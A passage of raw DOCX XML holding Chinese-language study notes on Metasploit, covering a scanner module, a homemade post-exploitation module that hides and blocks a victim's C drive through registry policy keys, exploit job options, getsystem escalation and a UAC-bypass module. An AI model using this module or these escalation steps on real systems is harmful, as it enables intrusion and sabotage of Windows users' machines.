      </w:r>
    </w:p>
    <w:p w:rsidR="009E3B80" w:rsidRPr="009E3B80" w:rsidRDefault="009E3B80" w:rsidP="009E3B80">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3B80">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">            'Yorick Koster' # msf module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="009E3B80" w:rsidP="009E3B80">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3B80">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">          ],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  'License'     =&gt; MSF_LICENSE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)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register_wmap_options({ #设定可以options部分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    'OrderID' =&gt; 0,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    'Require' =&gt; {},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  })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end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# Fingerprint a single host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def run_host(ip) #重写了lib/msf/core/auxiliary/scanner.rb中的run_host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begin  #一个方法的开始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  connect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  res = send_request_raw({ 'uri' =&gt; '/', 'method' =&gt; 'GET' }) #timeout默认是20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#一直追查这个函数的实现可以知道，还有这些参数：agent，cookie，proto，headers....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#还有一个发包函数叫做send_request_cgi，在参数上多提供了vars_post，vars_get 使得传递数据变得简单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  fp = http_fingerprint(:response =&gt; res)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  print_status("#{ip}:#{rport} #{fp}") if fp #if语句放在了一行的后面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  report_service(:host =&gt; rhost, :port =&gt; rport, :sname =&gt; (ssl ? 'https' : 'http'), :info =&gt; fp)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rescue ::Timeout::Error, ::Errno::EPIPE #异常处理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ensure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  disconnect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  end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 xml:space="preserve">  end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end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自己编写一个run_host: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def run__host(target_host)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  <w:t>connect(true, false) #true定了全局参数的使用，false关闭模块详细功能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  <w:t>if(banner) #banner的值来自于connect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  <w:t>print_status("#{rhost} is running #{banner}") #这种用法记一下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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>end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  <w:t>disconnect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end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自己编写一个改注册表后渗透攻击模块：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require 'msf/core'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require 'rex'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require 'msf/core/post/windows/registry'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class MetasploitModule &lt; Msd::Post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  <w:t>include Msf::Post::Windows::Registry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  <w:t>def initialize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  <w:t>super (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  <w:t>'Name'</w:t>
      </w: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  <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>'Drive Disabler Module'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  <w:t>'Description'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>'C Drive Disabler Module'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  <w:t>'License'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">=&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>MSF_LICENSE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  <w:t>'Author'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>'Thx'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  <w:t>)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  <w:t>end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  <w:t>def run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  <w:t>key1="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"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  <w:t>print_line("Disabling C Driver")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  <w:t>meterpreter_registry_setvaldata(key1, 'NoDrives', '4', 'REG_DWORD')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  <w:t>print_line("Setting No Drive For C")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  <w:t>meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', '4', 'REG_DWORD')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  <w:t>print_line("Removing View On The Drive")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pP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</w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>print_line("Disabled C Drive")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ab/>
        <w:t>end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end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4是C驱动器掩码。计算公式：2^(驱动器字符序列号-1)，C是第三个字母所以就是2的2次方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525F3A" w:rsidRDefault="00971F88" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>进入session Num以后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>通过background命令回来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D14A6" w:rsidRDefault="002D14A6" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0013427B" w:rsidRDefault="0013427B" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0013427B" w:rsidRPr="0013427B" w:rsidRDefault="0013427B" w:rsidP="0013427B">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00F60230">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F60230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F60230">
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –j   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D51B3" w:rsidRDefault="00AF1B34" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>似乎那些脚本比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
        </w:rPr>
        <w:t>exploit/multi/handler的端口是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="001522D8" w:rsidRDefault="001522D8" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -e &lt;opt&gt;  The payload encoder to use.  If none is specified, ENCODER is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -f        Force the exploit to run regardless of the value of MinimumRank.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    -h        Help banner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="0088683E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j        Run in the context of</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA1CD6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a job.</w:t>
      </w:r>
      <w:r w:rsidR="0088683E" w:rsidRPr="00FA1CD6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088683E" w:rsidRPr="00FA1CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="0088683E" w:rsidRPr="00FA1CD6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Exploit running as background job</w:t>
      </w:r>
      <w:r w:rsidR="0088683E" w:rsidRPr="00FA1CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -n &lt;opt&gt;  The NOP generator to use.  If none is specified, NOP is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -o &lt;opt&gt;  A comma separated list of options in VAR=VAL format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -p &lt;opt&gt;  The payload to use.  If none is specified, PAYLOAD is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRPr="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00DF4BFF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4BFF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">    -t &lt;opt&gt;  The target index to use.  If none is specified, TARGET is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4BFF" w:rsidRDefault="00DF4BFF" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747614">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-z        Do not interact with the session after successful exploitation.</w:t>
      </w:r>
      <w:r w:rsidR="00CA203D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不进行交互</w:t>
      </w:r>
      <w:r w:rsidR="00115E76">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00115E76">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>当渗透成功以后</w:t>
      </w:r>
      <w:r w:rsidR="007D3E69">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。因为</w:t>
      </w:r>
      <w:r w:rsidR="007D3E69">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>有时候设置了自动运行脚本的话</w:t>
      </w:r>
      <w:r w:rsidR="007D3E69">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007D3E69">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这样就会</w:t>
      </w:r>
      <w:r w:rsidR="007D3E69">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>比较烦。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7C94">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>对于getsystem运行失败的解决办法</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7C94">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 默认就是全部都试一遍的-t 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="48" w:space="12" w:color="292929"/>
          <w:right w:val="single" w:sz="48" w:space="12" w:color="292929"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
        <w:spacing w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve">    -t &lt;opt&gt;  The technique to use. (Default to '0').</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="48" w:space="12" w:color="292929"/>
          <w:right w:val="single" w:sz="48" w:space="12" w:color="292929"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
        <w:spacing w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
        <w:t>0 : All techniques available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="48" w:space="12" w:color="292929"/>
          <w:right w:val="single" w:sz="48" w:space="12" w:color="292929"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
        <w:spacing w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
        <w:t>1 : Service - Named Pipe Impersonation (In Memory/Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="48" w:space="12" w:color="292929"/>
          <w:right w:val="single" w:sz="48" w:space="12" w:color="292929"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
        <w:spacing w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
        <w:t>2 : Service - Named Pipe Impersonation (Dropper/Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRPr="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="48" w:space="12" w:color="292929"/>
          <w:right w:val="single" w:sz="48" w:space="12" w:color="292929"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
        <w:spacing w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="DDDDDD"/>
        </w:rPr>
        <w:tab/>
        <w:t>3 : Service - Token Duplication (In Memory/Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRPr="00AE7C94" w:rsidRDefault="00AE7C94" w:rsidP="00AE7C94">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7C94">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>[-] priv_elevate_getsystem: Operation failed: Access is denied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72704" w:rsidRPr="00A15C24" w:rsidRDefault="00AE7C94" w:rsidP="00C72704">
      <w:r w:rsidRPr="00C72704">
        <w:t>这个错误表示</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72704">
        <w:t>getsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72704">
        <w:t>内置的三种方法不行了</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>那就使用</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>先将</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>放到后台去</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>回到</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00C72704" w:rsidRPr="00C72704">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t>windows/local/…..</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t xml:space="preserve"> session 1</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t xml:space="preserve">set PALOAD </w:t>
      </w:r>
      <w:r w:rsidR="006554AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>希望</w:t>
      </w:r>
      <w:r w:rsidR="006554AD">
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidR="006554AD">
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="006554AD">
        <w:t>使用的</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t>set LHOST</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00A15C24">
        <w:t>set LPORT</w:t>
      </w:r>
      <w:r w:rsidR="006554AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7C94" w:rsidRDefault="000D3F01" w:rsidP="00AE7C94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7C94">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] priv_elevate_getsystem: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D3F01">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operation failed: The environment is incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7662" w:rsidRPr="000D3F01" w:rsidRDefault="005A7662" w:rsidP="005A7662">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过一会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己中断了，受害机弹出“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以停止工作”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A4528" w:rsidRDefault="002561CA" w:rsidP="000D3F01">
      <w:r w:rsidRPr="002561CA">
        <w:t>use exploit/windows/local/bypassuac_fodhelper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>x86</w:t>
